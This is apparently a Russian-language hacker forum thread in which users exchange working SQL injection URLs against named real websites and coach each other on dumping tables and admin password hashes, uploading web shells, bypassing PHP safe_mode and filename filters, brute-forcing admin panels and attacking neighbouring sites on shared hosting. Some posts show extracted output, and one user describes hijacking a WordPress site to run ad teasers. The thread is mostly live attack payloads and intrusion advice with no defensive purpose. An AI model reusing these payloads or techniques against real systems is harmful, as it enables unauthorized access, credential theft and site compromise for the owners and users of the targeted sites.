http://www.raarfm.com/shows/cinr_suite?id=-116'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47, 48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64 ,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,8 1,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97, 98,99,100,101,102,103,104,105,106,107,108,109,110, 111,112,113,114,115,116,117,118,119,120,121,122,12 3,124,125,126,127,128,129,130,131,132+--+

Code:
http://www.raarfm.com/shows/cinr_suite?id=116'and(1)=(0)union/*!all*/select(1),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38,39,40,41,42,43,44,45,46,unhex(hex(ver sion())),48,49,50,51,52,53,54,55,56,57,58,59,60,61 ,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,7 8,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94, 95,96,97,98,99,100,101,102,103,104,105,106,107,108 ,110,111,112,113,114,115,116,117,118,119,120,121,1 22,123,124,125,126,127,128,129,130,131,132,(133)--+

4.1.14-STANDARD

помогите нубу расскрутить, и если там вообще таблицы

http://www.simonsig.co.za/about.php?id=1%27

http://www.ak-47.us/AK47-FAQ.php?id=137

probm said:
помогите нубу расскрутить, и если там вообще таблицы
http://www.simonsig.co.za/about.php?id=1%27
http://www.ak-47.us/AK47-FAQ.php?id=137


нуб..крути как слепую..или через ошибку выводи..за тебя делать никто ничего не собирается,хотя у второго 3-я версия мускуля...сложно будет для тебя

probm said:
помогите нубу расскрутить, и если там вообще таблицы
http://www.simonsig.co.za/about.php?id=1%27




http://www.simonsig.co.za/ourWinesDisplay.php?TB_iframe=true&height=250&width=450&id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,usr_user name,usr_password),8,9,0,11,12,13,14+from+user


// админские хеши не выкладываем

У меня есть данные от базы на одном сайте. Но phpmyadmin я там не нашел.

Просканив сайт , обнаружил только ц.панель.

Возможно ли как то зайти в ц-панель или в базу данных. Зная только логин/пароль от самой базы. Сервер локалхост , так что через навикет не пускает.

И если кто то знает , может подсказать как генерируются логины для ц панели , то встречал что пароль от базы , такой же как и в ц панеле.

Moriarty said:
cPanel: user12345
mysql: user12345_user


спасибо.

А возможно будет подключение к бд , через сайт соседа ?

А возможно будет подключение к бд , через сайт соседа ?


если хостер не разрешил (что обычно ими не разрешается), доступ "откуда-то", ты не сможешь зайти откуда-то в базу, лучше попробуй найти phpmyadmin, если на сайте не найдешь ищу у хостера

Например для всех сайтов на hc.ru можно зайти в базу так

phpmyadmin.hc.ru

как вывести названия таблиц?

http://mai1-ru.h2m.ru/yyy.php?id=1%27+union+select+1,2,table_name+from+i nformation_schema.tables%20where%201=%27

qaz

http://mai1-ru.h2m.ru/yyy.php?id=1'+and+false+union+select+1,2,table_nam e+FrOm+information_schema.tables+limit+1--%201

qaz said:
как вывести названия таблиц?
http://mai1-ru.h2m.ru/yyy.php?id=1%27+union+select+1,2,table_name+from+i nformation_schema.tables%20where%201=%27




Code:
http://mai1-ru.h2m.ru/yyy.php?id=1%27+union+select+1,2,group_concat%28ta ble_name%29+from+information_schema.tables+--+

Используй substring(group_concat(...),200) для просмотра остальных таблиц, увеличивая число 200 будешь смотреть дальше))

Обход ограничений php safe_mod.

Задался целью обойти safe_mod.

PHP Version 5.1.6

информация из phpinfo()


PHP:

System Linux u-host.ru 2.6.9-100.ELsmp#1 SMP Tue Feb 1 12:17:32 EST 2011 i686

Build Date Sep 29 2007 03:15:40

Configure Command'./configure' '--host=i686-redhat-linux-gnu' '--build=i686-redhat-linux-gnu' '--target=i386-redhat-linux' '--program-prefix=' '--prefix=/usr' '--exec-prefix=/usr' '--bindir=/usr/bin' '--sbindir=/usr/sbin' '--sysconfdir=/etc' '--datadir=/usr/share' '--includedir=/usr/include' '--libdir=/usr/lib' '--libexecdir=/usr/libexec' '--localstatedir=/var' '--sharedstatedir=/usr/com' '--mandir=/usr/share/man' '--infodir=/usr/share/info' '--cache-file=../config.cache' '--with-libdir=lib' '--with-config-file-path=/etc' '--with-config-file-scan-dir=/etc/php.d' '--disable-debug' '--with-pic' '--disable-rpath' '--without-pear' '--with-bz2' '--with-curl' '--with-exec-dir=/usr/bin' '--with-freetype-dir=/usr' '--with-png-dir=/usr' '--enable-gd-native-ttf' '--without-gdbm' '--with-gettext' '--with-gmp' '--with-iconv' '--with-jpeg-dir=/usr' '--with-openssl' '--with-png' '--with-pspell' '--with-expat-dir=/usr' '--with-pcre-regex=/usr' '--with-zlib' '--with-layout=GNU' '--enable-exif' '--enable-ftp' '--enable-magic-quotes' '--enable-sockets' '--enable-sysvsem' '--enable-sysvshm' '--enable-sysvmsg' '--enable-track-vars' '--enable-trans-sid' '--enable-yp' '--enable-wddx' '--with-kerberos' '--enable-ucd-snmp-hack' '--with-unixODBC=shared,/usr' '--enable-memory-limit' '--enable-shmop' '--enable-calendar' '--enable-dbx' '--enable-dio' '--with-mime-magic=/etc/httpd/conf/magic' '--without-sqlite' '--with-libxml-dir=/usr' '--with-mcrypt' '--with-xml' '--with-apxs2=/usr/sbin/apxs' '--without-mysql' '--without-gd' '--without-odbc' '--disable-dom' '--disable-dba' '--without-unixODBC' '--disable-

pdo' '--disable-xmlreader' '--disable-xmlwriter'

Server API Apache 2.0 Handler

Virtual Directory Support disabled

Configuration File(php.ini)Path/etc/php.ini

Scan this dirforadditional.ini files/etc/php.d

additional.ini files parsed/etc/php.d/bcmath.ini, /etc/php.d/dba.ini, /etc/php.d/dom.ini, /etc/php.d/gd.ini, /etc/php.d/imap.ini, /etc/php.d/ldap.ini, /etc/php.d/mbstring.ini, /etc/php.d/mysql.ini, /etc/php.d/mysqli.ini, /etc/php.d/ncurses.ini, /etc/php.d/odbc.ini, /etc/php.d/pdo.ini, /etc/php.d/pdo_mysql.ini, /etc/php.d/pdo_odbc.ini, /etc/php.d/pdo_pgsql.ini, /etc/php.d/pdo_sqlite.ini, /etc/php.d/pgsql.ini, /etc/php.d/snmp.ini, /etc/php.d/soap.ini, /etc/php.d/sqlite.ini, /etc/php.d/xmlreader.ini, /etc/php.d/xmlrpc.ini, /etc/php.d/xmlwriter.ini, /etc/php.d/xsl.ini

PHP API 20041225

PHP Extension 20050922

Zend Extension 220051025

Debug Build no

Thread Safety disabled

Zend Memory Manager enabled

IPv6 Support enabled

Registered PHP Streams php,file,http,ft p,compress.bzip2,compress.zlib,https,ftps

Registered Stream Socket Transports tc p,udp,unix,udg,ssl,sslv3,sslv2,tls

Registered Stream Filters string.rot13, string.toupper,string.tolower,string.strip_tags,co nvert.*,consumed,convert.iconv.*,bzip2.*,zlib.*

PHP Credits

Configuration

PHP CoreDirective Local Value Mast er Value

allow_call_time_pass_reference Off O ff

allow_url_fopen On On

always_populate_raw_post_data Off Of f

arg_separator.input& &

arg_separator.output& &

asp_tags Off Off

auto_append_file no value no value

auto_globals_jit On On

auto_prepend_file no value no valu e

browscap no value no value

default_charset no value no value

default_mimetype text/html text/html

define_syslog_variables Off Off

disable_classes no value no value

disable_functions ini_restore ini_re store

display_errors On On

display_startup_errors Off Off

doc_root no value no value

docref_ext no value no value

docref_root no value no value

enable_dl On On

error_append_string no value no va lue

error_log no value no value

error_prepend_string no value no v alue

error_reporting 0 2037

expose_php On On

extension_dir/usr/lib/php/modules/usr/lib/php/modules

file_uploads On On

highlight.bg#FFFFFF #FFFFFF

highlight.comment#FF8000 #FF8000

highlight.default#0000BB #0000BB

highlight.html#000000 #000000

highlight.keyword#007700 #007700

highlight.string#DD0000 #DD0000

html_errors On On

ignore_repeated_errors Off Off

ignore_repeated_source Off Off

ignore_user_abort On Off

implicit_flush Off Off

include_path. .

log_errors Off Off

log_errors_max_len 1024 1024

magic_quotes_gpc Off Off

magic_quotes_runtime Off Off

magic_quotes_sybase Off Off

mail.force_extra_parameters no value no value

max_execution_time 60 60

max_input_nesting_level 64 64

max_input_time 60 60

memory_limit 64M 64M

open_basedir/var/virtual/www/.ru/httpdocs:/tmp no value

output_buffering 4096 4096

output_handler no value no value

post_max_size 64M 64M

precision 14 14

realpath_cache_size 16K 16K

realpath_cache_ttl 120 120

register_argc_argv Off Off

register_globals On Off

register_long_arrays On Off

report_memleaks On On

report_zend_debug On On

safe_mode On Off

safe_mode_exec_dir no value no val ue

safe_mode_gid Off Off

safe_mode_include_dir no value no value

sendmail_from no value no value

sendmail_path/usr/sbin/sendmail-t-i/usr/sbin/sendmail-t-i

serialize_precision 100 100

short_open_tag On On

SMTP localhost localhost

smtp_port 25 25

sql.safe_mode Off Off

track_errors Off Off

unserialize_callback_func no value no value

upload_max_filesize 64M 64M

upload_tmp_dir no value no value

user_dir no value no value

variables_order EGPCS EGPCS

xmlrpc_error_number 0 0

xmlrpc_errors Off Off

y2k_compliance On On

zend.ze1_compatibility_mode Off Off

apache2handlerApache Version Apache/2.0.52(Red Hat)

Apache API Version 20020903

Server Administrator vlad@siteholder.ru� �

Hostname:Port altpark.ru:80

User/Group apache(48)/48

Max Requests Per Child:2000-Keep Alive:on-Max Per Connection:300

Timeouts Connection:60-Keep-Alive:15

Virtual Server Yes

Server Root/etc/httpd

Loaded Modules core prefork http_core� �mod_so mod_access mod_auth mod_auth_anon mod_ auth_digest mod_include mod_log_config mod_env� �mod_expires mod_deflate mod_headers mod_usertr ack mod_setenvif mod_mime mod_dav mod_status mod_autoindex mod_info mod_dav_fs mod_vhost_ali as mod_negotiation mod_dir mod_actions mod_use rdir mod_alias mod_rewrite mod_cache mod_suexe c mod_disk_cache mod_file_cache mod_mem_cache mod_cgi mod_fpcgid mod_jk mod_bw mod_fcgid mo d_perl mod_php5 mod_ssl



Возможности залить .httpacces нет.

часть фаилов читается posix методом.

из того что нашел работает только творение от крыса которое позволяет листать дериктории и смотреть какие в них есть фаилы, но отображаются не все.

ReV0LVeR said:
Возможности залить .httpacces нет.
.


что это такое? Оо

eclipse said:
если хостер не разрешил (что обычно ими не разрешается), доступ "откуда-то", ты не сможешь зайти откуда-то в базу, лучше попробуй найти phpmyadmin, если на сайте не найдешь
ищу у хостера
Например для всех сайтов на hc.ru можно зайти в базу так
phpmyadmin.hc.ru


Ну на наших сайтах , проблемы найти пхпмайадмин нету.

А вот на забугорных , 1 к 30 что найду... В этом вся и проблема (

Konqi.

Я htaccess имел в виду разумеется)

Всем привет!!!

Есть скуля вида


http://locakhost/site.php?page=1')+(select+upper(xmltype(chr(60)||c hr(58)||ch r(58)||(select+rawtohex(column_name)from(select+co lumn_name,rownum+rnum+from+sys.USER_TAB_COLUMNS+a) where+rnum=1)||chr(58)||chr(58)||chr(62)))from dual)--+


Возможно ли выполнить системные комманды, или залить шелл. Буду очень благодарен за дельные советы;-)

LiRvD082 said:
Всем привет!!!
Есть скуля вида
Возможно ли выполнить системные комманды, или залить шелл. Буду очень благодарен за дельные советы;-)


Если кавычка фильтруется - нет, если нет - да

что то вобще не понимаю как подступиться к скули...посоветуйте плыз

http://www.bronx.nl/shop/category.php?cat_id=1+order+by+10--

Там многие спецсимволы экранируются, в том числе и скобки. Поэтому вряд ли что выйдет со скулей.

jecka3000 said:
что то вобще не понимаю как подступиться к скули...посоветуйте плыз
http://www.bronx.nl/shop/category.php?cat_id=1+order+by+10--


http://www.bronx.nl/shop/category.php?cat_id=1+group+by+130--+

M_script said:
http://www.bronx.nl/shop/category.php?cat_id=1+group+by+130--+


Как здесь вывести версию БД?

Вот, по идее, всё правильно:

_http://www.namakon.ru/articles.php?p=3+and+1=0+union+select+1,2,group_co ncat(concat_ws(0x3a3a3a,id,name,passwd)+separator+ 0x0b),4,5,6,7,8,9+from+users+limit+0,20--

Что не так? помогите!!!

Osstudio said:
Вот, по идее, всё правильно:
_http://www.namakon.ru/articles.php?p=3+and+1=0+union+select+1,2,group_co ncat(concat_ws(0x3a3a3a,id,name,passwd)+separator+ 0x0b),4,5,6,7,8,9+from+users+limit+0,20--
Что не так? помогите!!!



http://www.namakon.ru/articles.php?p=3+and+1=0+union+select+1,2,count(*) ,4,5,6,7,8,9+from+users+--+

Она пустая.

FlaktW said:
http://www.namakon.ru/articles.php?p=3+and+1=0+union+select+1,2,count(*) ,4,5,6,7,8,9+from+users+--+
Она пустая.


То-есть нам нету пользователей что-ли??

Osstudio said:
То-есть нам нету пользователей что-ли??



Точно.

FlaktW said:
Точно.


Как такое может быть вообще?!

Первый раз с таким сталкиваюсь...

И что подскажете?

Если на этом сайт ещё найду уязвимости, результат будет тот-же?!

Подпишусь под вышенаписанным и спрошу совета у знатоков.

Есть подобная ситуация, на сайте 3 базы, 2 местные и information_schema, ни в одной ни единого пользователя, как быть?

Osstudio said:
Как такое может быть вообще?!
Первый раз с таким сталкиваюсь...
И что подскажете?
Если на этом сайт ещё найду уязвимости, результат будет тот-же?!


Да. Ищи уязвимости на этом сервере на остальных сайтах, может быть, там прорвешься:

# Домен

1 www.catalonia-online.com

2 elsteel.ru

3 www.namakon.ru

4 www.calc.ru

5 www.extrimdrive.ru

6 sodiamex.ru

7 www.2dstudio.ru

8 www.duol.ru

9 www.artsok.com

10 italia-online.ru

11 www.analizfamilii.ru

12 stroylist.ru

13 www.forum.analizfamilii.ru

14 www.cronstudio.ru

15 autoledy.ru

16 www.mosdoma.ru

17 cron.ru

18 roof-style.com

19 citymulti.ru

20 vtecktonik.ru

21 frivent.ru

22 autoledi.ru

23 www.militaryband.ru

24 smstechsupport.ru

25 www.evstyle.ru

26 expolink.ru

27 zookormushka.ru

28 www.superdog.ru

29 www.stroyelite.ru

FlaktW said:
Да. Ищи уязвимости на этом сервере на остальных сайтах, может быть, там прорвешься:
# Домен
1 www.catalonia-online.com
2 elsteel.ru
3 www.namakon.ru
4 www.calc.ru
5 www.extrimdrive.ru
6 sodiamex.ru
7 www.2dstudio.ru
8 www.duol.ru
9 www.artsok.com
10 italia-online.ru
11 www.analizfamilii.ru
12 stroylist.ru
13 www.forum.analizfamilii.ru
14 www.cronstudio.ru
15 autoledy.ru
16 www.mosdoma.ru
17 cron.ru
18 roof-style.com
19 citymulti.ru
20 vtecktonik.ru
21 frivent.ru
22 autoledi.ru
23 www.militaryband.ru
24 smstechsupport.ru
25 www.evstyle.ru
26 expolink.ru
27 zookormushka.ru
28 www.superdog.ru
29 www.stroyelite.ru


Ага, спасибо =)

zlo12 said:
Подпишусь под вышенаписанным и спрошу совета у знатоков.
Есть подобная ситуация, на сайте 3 базы, 2 местные и information_schema, ни в одной ни единого пользователя, как быть?


Просто нет пользователей...пользуйся советом:


Ищи уязвимости на этом сервере на остальных сайтах, может быть, там прорвешься

Вот ещё вопрос...были ли в битриксе этого года уязвимости?!

http://elsteel.ru/bitrix/admin/index.php

Osstudio said:
Вот ещё вопрос...были ли в битриксе этого года уязвимости?!
http://elsteel.ru/bitrix/admin/index.php


админка в битриксе брутится без проблем, так что вперёд

--

Вопрос:был доступ к сайту, напичкал его тизерами, зашёл админ (по сайту видно). Больше я зайти не могу. Опять залез в дырку - пароль тот же что и раньше, но заёти не могу. Деды, прокси, впн пробовал, не заходит. Что делать?

zlo12 said:
Вопрос:был доступ к сайту, напичкал его тизерами, зашёл админ (по сайту видно). Больше я зайти не могу. Опять залез в дырку - пароль тот же что и раньше, но заёти не могу. Деды, прокси, впн пробовал, не заходит. Что делать?


Ты даешь слишком мало информации, вопрос из разряда:

"Была у меня белая шляпа - потерял, пробывал одевать на голову котелок, чайник >> не получилось. Как быть?"

P.S. Osstudio ака IScript очень неудачный тролль

Есть пхп-инъекция в скрипте, сервер под виндой. Не могу залить шелл средствами пхп (fopen, copy и тп). Какие еще существуют способы залиться на виндовый сервер? Буду благодарен любой помощи.

"]
[RedSky] said:
Ты даешь слишком мало информации, вопрос из разряда:
"Была у меня белая шляпа - потерял, пробывал одевать на голову котелок, чайник >> не получилось. Как быть?"


движок вордпресс. кинопортал. иностранный.

один день был в моём распоряжении через лог и пасс админа.

На следующий день сменилась пара баннеров, появилась капча на входе в админку. Не могу войти, не понимаю почему.

Через раскрученную скулю достаю пароль админа, который совпадает с тем, через который удачно заходил, но не могу зайти. Больше инфы нету

scr1m77


PHP:
';?>

Moriarty said:
Где в мускуле рутовый пароль выдрать?



база mysql, таблица user

zlo12 said:
Вопрос:был доступ к сайту, напичкал его тизерами, зашёл админ (по сайту видно). Больше я зайти не могу. Опять залез в дырку - пароль тот же что и раньше, но заёти не могу. Деды, прокси, впн пробовал, не заходит. Что делать?




zlo12 said:
движок вордпресс. кинопортал. иностранный.
один день был в моём распоряжении через лог и пасс админа.
На следующий день сменилась пара баннеров, появилась капча на входе в админку. Не могу войти, не понимаю почему.
Через раскрученную скулю достаю пароль админа, который совпадает с тем, через который удачно заходил, но не могу зайти. Больше инфы нету



Ну ты даешь. Тизерами напичкал. У тебя с головой все нормально? Много поднял на тизерах то за один день?

А насчет админки - наверное, ввели вход только для админского ip


Moriarty said:
Другая обстановка: шелл...в движке база...у конфиг.файла двига есть юзер для базы...этому юзеру доступна только инф.схема и собственная бд...в инф.схеме у этого юзера права как всегда:
PRIVILEGE_TYPE - USAGE
IS_GRANTABLE - NO
бд mysql и близко нету...поэтому и ищу физическое расположение файлов
my.cnf - понятно пустой...



Где-то в районе /var/lib/mysql/

Но 99% что ты не сможешь прочитать файлы там или даже войти в папку.

Есть шелл на сайте, на сервере стоит SquirrelMail. Нужно узнать пароль от ящика, как это можно сделать?

ZARO said:
Есть шелл на сайте, на сервере стоит SquirrelMail. Нужно узнать пароль от ящика, как это можно сделать?


Разве не в БД?

ZARO said:
Есть шелл на сайте, на сервере стоит SquirrelMail. Нужно узнать пароль от ящика, как это можно сделать?


В конфиге SquirrelMail должны быть данные для подключения к базе почтового сервера.

народ, очень интерисует скуль иньекция которая возникает при подстановки минуса например id=-1 почему так происходит? хто может показать исходники кода при котором получится такая ошибка, спасибо

qaz said:
народ, очень интерисует скуль иньекция которая возникает при подстановки минуса например id=-1 почему так происходит? хто может показать исходники кода при котором получится такая ошибка, спасибо


qez

подстановка твоего вопроса не очень таки правильна

если передать -1 параметру, который передается в запрос

например

SELECT username,password FROM users WHERE id=-1;

с синтаксисом ничего не случится, тока запрос зафелсится, для посика скулей использовать "-", не правильно )

Tigger said:
Помотому что параметр обрабатывается intval()'ом или приводится к типу (int)$_GET['id'].
При id=-1 запрос получается SELECT text FROM posts WHERE id=-1
Что и вызывает ошибку.


ну да, такое тоже бывает, а вообще стандартизировать нельзя никак, кодеры все мыслят по своему, бог знает что они там пишут и что получается в конце, так что все зависит от ситуации

Konqi said:
qez
подстановка твоего вопроса не очень таки правильна
если передать -1 параметру, который передается в запрос
например
SELECT username,password FROM users WHERE id=-1;
с синтаксисом ничего не случится, тока запрос зафелсится, для посика скулей использовать "-", не правильно )


ну например тут

http://felixonline.co.uk/print.php?article=-900

есть же ошибка, очень интересует исходный код етого запроса

и ещо одно

http://www.animeacademy.com/finalrevdisplay.php?id=34%27%20union%20select%201, 2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,user%28%29 ,19,20%20%20from%20%20AnimTest%20%20where%201%20=% 20%27

как вывести какуюнибуть инфу????

qaz said:
ну например тут
http://felixonline.co.uk/print.php?article=-900
есть же ошибка, очень интересует исходный код етого запроса
как вывести какуюнибуть инфу????


это ошибка не из за синтаксиса, просто запрос возвращает фелс, дальше фелс передается в функцию mysql_result(); и тот в свою очередь ругается

PHP:
$this->attach_filename=str_replace('php','_php_',$this->attach_filename);

можно ли как-нибудь обойти?

phtml не работает.

qaz said:
ну например тут
http://felixonline.co.uk/print.php?article=-900
есть же ошибка, очень интересует исходный код етого запроса



http://felixonline.co.uk/print.php?article=-900+union+select+concat_ws(0x3a,version(),database (),user(),@@version_compile_os),2+--+

5.0.90-log:media_felix:media_felix@localhostc-linux-gnu

Если не знаете, так не отвечайте.

#Wolf# said:

PHP:
$this->attach_filename=str_replace('php','_php_',$this->attach_filename);

можно ли как-нибудь обойти?
phtml не работает.


str_replace чувствительная к регистру функция, соответственно рабочие варианты PHP, pHP, PHp, pHp.

Так же может сработать вариант залить .htaccess в котором указать нужное тебе расширение которое будет обрабатываться PHP интерпретатором.

Это если судить только по тому куску кода, что ты дал. Вполне вероятно, что $this->attach_filename принудительно переводить все символы в нижний регистр, а дальше по наклонной. В таком случае вариант с .htaccess должен сработать.

Expl0ited said:
str_replace чувствительная к регистру функция, соответственно рабочие варианты PHP, pHP, PHp, pHp.
Так же может сработать вариант залить .htaccess в котором указать нужное тебе расширение которое будет обрабатываться PHP интерпретатором.
Это если судить только по тому куску кода, что ты дал. Вполне вероятно, что $this->attach_filename принудительно переводить все символы в нижний регистр, а дальше по наклонной. В таком случае вариант с .htaccess должен сработать.


Файлы с разным регистром заливает, но отдает их на скачивание. А если добавлять с тем же регистром расширение в allowlist, оно автоматом переводится в нижний.

C htaccess не сработает, перед файлом рандомный текст добавляется.

p.s. Движок TorrentPier

http://www.animeacademy.com/finalrevdisplay.php?id=34%27%20union%20select%201, 2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,user%28%29 ,19,20%20%20from%20%20AnimTest%20%20where%201%20=% 20%27

как вывести какуюнибуть инфу????

qaz said:
http://www.animeacademy.com/finalrevdisplay.php?id=34%27%20union%20select%201, 2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,user%28%29 ,19,20%20%20from%20%20AnimTest%20%20where%201%20=% 20%27
как вывести какуюнибуть инфу????


замени 34' на -1'

+toxa+ said:
замени 34' на -1'


заменил, пишет Error: Unable to seek data row: :

qaz said:
заменил, пишет Error: Unable to seek data row: :


Запрос:


Code:
http://www.animeacademy.com/finalrevdisplay.php?id=-1'+union+select+1,group_concat(concat(table_schema ,'.',table_name)),3,4,5,6,7,8,9,10,11,12,13,14,15, 16,17,18,19,20+from+information_schema.tables+wher e+table_name+like+'%user%'+--+

Результат:


Code:
information_schema.USER_PRIVILEGES, animeacademy.attachmentcategoryuser, animeacademy.poll_user, animeacademy.user, animeacademy.useractivation, animeacademy.userban, animeacademy.userchangelog, animeacademy.usercss, animeacademy.usercsscache, animeacademy.userfield, animeacademy.usergroup, animeacademy.usergroupleader, animeacademy.usergrouprequest, animeacademy.userlist, animeacademy.usernote, animeacademy.userpromotion, animeacademy.usertextfield, animeacademy.usertitle, animeacademy2.poll_user

Почему когда например делаешь такой запрос:

/index.php?/\/\/\.ааауук

То всё нормально открывается, и адрес остаётся таким же?!

Osstudio said:
Почему когда например делаешь такой запрос:
/index.php?/\/\/\.ааауук
То всё нормально открывается, и адрес остаётся таким же?!


о_0

А ты чего ждешь? После знака ? идут GET параметры, пересылаемые скрипту, но в твоем случае нет равенства, поэтому он вообще никак не реагирует. Если в скрипте была бы обработка таких данных, то как-нибудь бы и отреагировал скрипт.

Прочитай RFC по HTTP протоколу, много нового узнаешь =\

http://localhost/version.php?blablabla


PHP:






Code:
Array ( [blablabla] => )

Вот если бы было к примеру условие: если в REQUEST входит blablabla то include('blablabla.php'); То да, что-то изменилось, но раз ничего такого нету, то данные никак не обрабатывается и не несут никаких изменений в логику работы скрипта.

Что не так?!

http://www.yotaservis.ru/goods.php?typeId=1+and+1=0+union+select+1,group_co ncat%28table_name+separator+0x3a%29+from+informati on_schema.tables+where+table_schema=0x646238353038 61--

dotMX said:
Добрый вечер.
Сразу извинюсь за глупый вопрос.
Залил шелл на 1 сайт, полные права на изменение файлов и php mode
ff. В папке domains лежат еще несколько доменов, но к ним нет доступа.
Вопрос:
Можно ли как-нибудь эти домены поиметь? В прошлом много раз читал, как ломают нужные домены через "соседей".Не уверен, что у "соседей" были рутовые права на весь сервер, а проверить этого не могу(тупо не помню где читал статьи).


У соседей 99% не будет никаком сервере рутовых прав о_0

Ломают через соседей так: нужен сайт1, пробили по ревип и там есть сайт2, похекали и залили шелл на сайт2 и там либо кривые права и есть доступ к сайт1, либо рутать, либо через сессии.

А у тебя права не кривые, т.ч. либо рутай, либо через сессии если если доступ конечно, а он обычно есть. Не вижу смысла в этой теме рассказывать про то как поиметь через сессии, ищи по форуму.


Osstudio said:
Что не так?!
http://www.yotaservis.ru/goods.php?typeId=1+and+1=0+union+select+1,group_co ncat%28table_name+separator+0x3a%29+from+informati on_schema.tables+where+table_schema=0x646238353038 61--


http://www.yotaservis.ru/goods.php?typeId=1+and+1=0+union+select+1,unhex(he x(table_name))+from+information_schema.tables+wher e+table_schema=0x64623835303861--+

Tigger said:
У соседей 99% не будет никаком сервере рутовых прав о_0
Ломают через соседей так: нужен сайт1, пробили по ревип и там есть сайт2, похекали и залили шелл на сайт2 и там либо кривые права и есть доступ к сайт1, либо рутать, либо через сессии.
А у тебя права не кривые, т.ч. либо рутай, либо через сессии если если доступ конечно, а он обычно есть. Не вижу смысла в этой теме рассказывать про то как поиметь через сессии, ищи по форуму.
http://www.yotaservis.ru/goods.php?typeId=1+and+1=0+union+select+1,unhex(he x(table_name))+from+information_schema.tables+wher e+table_schema=0x64623835303861--+


А разделитель (например ":") не надо, потому-что только одна таблица?!

И как тогда дальше?! Как здесь другую кодировку сделать:

http://www.yotaservis.ru/goods.php?typeId=1+and+1=0+union+select+1,group_co ncat%28column_name+separator+0x3a%29+from+informat ion_schema.columns+where+table_name=0x466171--+

Osstudio said:
А разделитель (например ":") не надо, потому-что только одна таблица?!
И как тогда дальше?! Как здесь другую кодировку сделать:
http://www.yotaservis.ru/goods.php?typeId=1+and+1=0+union+select+1,group_co ncat%28column_name+separator+0x3a%29+from+informat ion_schema.columns+where+table_name=0x466171--+


http://www.yotaservis.ru/goods.php?typeId=1+and+1=0+union+select+1,group_co ncat(unhex(hex(column_name))+separator+0x3a)+from+ information_schema.columns+where+table_name=0x4661 71--+

не?

Tigger said:
http://www.yotaservis.ru/goods.php?typeId=1+and+1=0+union+select+1,group_co ncat(unhex(hex(column_name))+separator+0x3a)+from+ information_schema.columns+where+table_name=0x4661 71--+
не?


Спасибо, дошло)

Osstudio said:
Спасибо, дошло)


HACKED by KDG-crew Kosova Defacers Group

до тебя там полмира побывало )))

Gorev said:
HACKED by KDG-crew Kosova Defacers Group
до тебя там полмира побывало )))




Теперь в курсе)

1. Как провести SQL-INJ в INSERT'e в СУБД MsAccess, если %00 и %16 не отбрасывают часть запроса?

2. Есть сайт на Java. Есть GET-запрос (act=methodname), вызывающий метод methodname (сделан вывод при условии что если изменить значение параметра act, то выводит ошибку, 500 что такое метод не найден). Если какой-то способ это эксплуатировать?

Посылаю запрос:

http://sitename/index.php?main_page=index&cPath=214'+union+select+123/*

На него выдает:


Code:
500
Internal Server Error

The server encountered an internal error or misconfiguration and was unable to complete your request.

Вопросы:

1. Хорошо это или плохо(сайт не мой)?

2. Почему ошибка 500, а не MySQL error?

3. Как это использовать дальше?

Вполне нормальный ответ сервера означающий что произошла ошибка внутри скрипта

1. С какой-то стороны хорошо - мало информации. С какой-то плохо - сайт явно даёт знать что произошла ошибка.

2. Потому что так сконфигурирован сервер.

3. Пробовать составить такой запрос, при котором ошибка возникать не будет

SaNn said:
Посылаю запрос:
http://sitename/index.php?main_page=index&cPath=214'+union+select+123/*
На него выдает:

Code:
500
Internal Server Error

The server encountered an internal error or misconfiguration and was unable to complete your request.

Вопросы:
1. Хорошо это или плохо(сайт не мой)?
2. Почему ошибка 500, а не MySQL error?
3. Как это использовать дальше?


Мой экстрасенсорный дар подсказывает, что это WAF.

Возможно там стоит фильтр, я встречал такие сайты. Кинь линк.

XAMEHA said:
Возможно там стоит фильтр, я встречал такие сайты. Кинь линк.


http://www.onsalecell.com/

Нашел уязвимость на сайте, не знаю как залить шелл

Нашел directory traversal на сайте, с его помощью прошерстил всевозможные конфиги. Прочитал файл /etc/passwd - пароли в /etc/shadow, который не читается с правами ломаемого скрипта. Далее нашел httpd.conf, посмотрел реврайт рулы, список виртуальных хостов, а также записи SQLAliasDbParam, где есть информация о юзернейме и пароле к скуле. (подключение локальное через сокет). Пробрутил фтп, нашел один логиy вида username:username с домашней папкой /home/username/.

Залил туда шелл и попробовал запустить через тот же directory traversal, но облом, видимо скрипту не хватает прав на доступ в этот каталог.

Так вот, я застрял, не знаю что с этим сделать, сайты из конфига апача все однотипные(кастом), кроме одного - на нем стоит vBulletin 3.7.3. Подскажите, куда стоит и куда не стоит копать дальше, плиз.

Fagcher


ты знаешь что такое directory traversal? или путаешь с LFI ?

залей шелл в /tmp и инклуди, если я тебя вообще правильно понял

Konqi said:
Fagcher

ты знаешь что такое directory traversal? или путаешь с LFI ?
залей шелл в /tmp и инклуди, если я тебя вообще правильно понял


Мм.. может быть и LFI, в чем отличие, если инклуд идет через ../../../../../../../../../../ чтоб добраться до корня, то называется Directory traversal, если сразу путь от корня типа /etc/passwd то LFI, так? допустим, это LFI, то как залить шелл в tmp? (Не обижусь если пошлете гуглить, но вроде бы уже множество тем облазил)

Fagcher said:
Мм.. может быть и LFI, в чем отличие, если инклуд идет через ../../../../../../../../../../ чтоб добраться до корня, то называется Directory traversal, если сразу путь от корня типа /etc/passwd то LFI, так? допустим, это LFI, то как залить шелл в tmp? (Не обижусь если пошлете гуглить, но вроде бы уже множество тем облазил)



дак ты же сказал что залил шелл в папку /home, так что тебе мешает залить в /tmp?

Konqi said:
дак ты же сказал что залил шелл в папку /home, так что тебе мешает залить в /tmp?


Залил в /home/username/ (домашний каталог юзера, к которому подобрал пароль)

Fagcher said:
Залил в /home/username/ (домашний каталог юзера, к которому подобрал пароль)


ну теперь через шелл в /tmp/ лей

попугай said:
ну теперь через шелл в /tmp/ лей


Может я неясно написал в первом посте, залить то я залил (через фтп) запустить не могу(( так что либо куда то еще лить, либо искать другие пути

